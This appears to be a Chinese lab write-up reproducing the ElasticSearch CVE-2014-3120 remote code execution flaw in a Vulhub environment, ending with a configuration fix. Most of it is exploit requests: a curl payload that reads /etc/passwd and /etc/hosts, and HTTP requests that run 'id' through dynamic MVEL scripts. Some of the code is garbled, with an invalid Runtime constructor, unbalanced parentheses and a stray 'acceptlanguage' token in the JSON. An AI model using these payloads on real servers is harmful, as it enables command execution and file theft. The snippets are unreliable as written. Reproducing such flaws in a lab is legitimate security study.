利⽤Vulnhub复现漏洞-ElasticSearch命令执⾏漏洞(CVE-2014-31。。。ElasticSearch 命令执⾏漏洞(CVE-2014-3120)测试环境 Vulnhub官⽅复现教程
漏洞原理
相关⽂档: 、
⽼版本ElasticSearch⽀持传⼊动态脚本(MVEL)来执⾏⼀些复杂的操作,⽽MVEL可执⾏Java代码,⽽且没有沙盒,所以我们可以直接执⾏任意代码。 MVEL执⾏命令的代码如下:
import java.io.*;
new java.util.Runtime().exec("id").getInputStream()).useDelimiter("\\A").next();
复现漏洞
启动环境
进⼊路径为
cd /root/vulhub/elasticsearch/CVE-2014-3120
搭建及运⾏漏洞环境:
docker-compose build && docker-compose up -d
⽤时:8分钟
环境启动后,显⽰
漏洞复现
将Java代码放⼊json中:
curl -XPOST 'localhost:9200/_search?pretty' -d '
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
}
}
},
"script_fields": {
"/etc/hosts": {
"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
},
"/etc/passwd": {
"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
}
}
}
'
⾸先,该漏洞需要es中⾄少存在⼀条数据,所以我们需要先创建⼀条数据:
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "phithon"
}
然后,执⾏任意代码:
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
acceptlanguage"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Runtime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" }
}
}
处理办法
关掉运⾏脚本功能,在配置⽂件l⾥为每个结点都加上:script.disable_dynamic: true
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议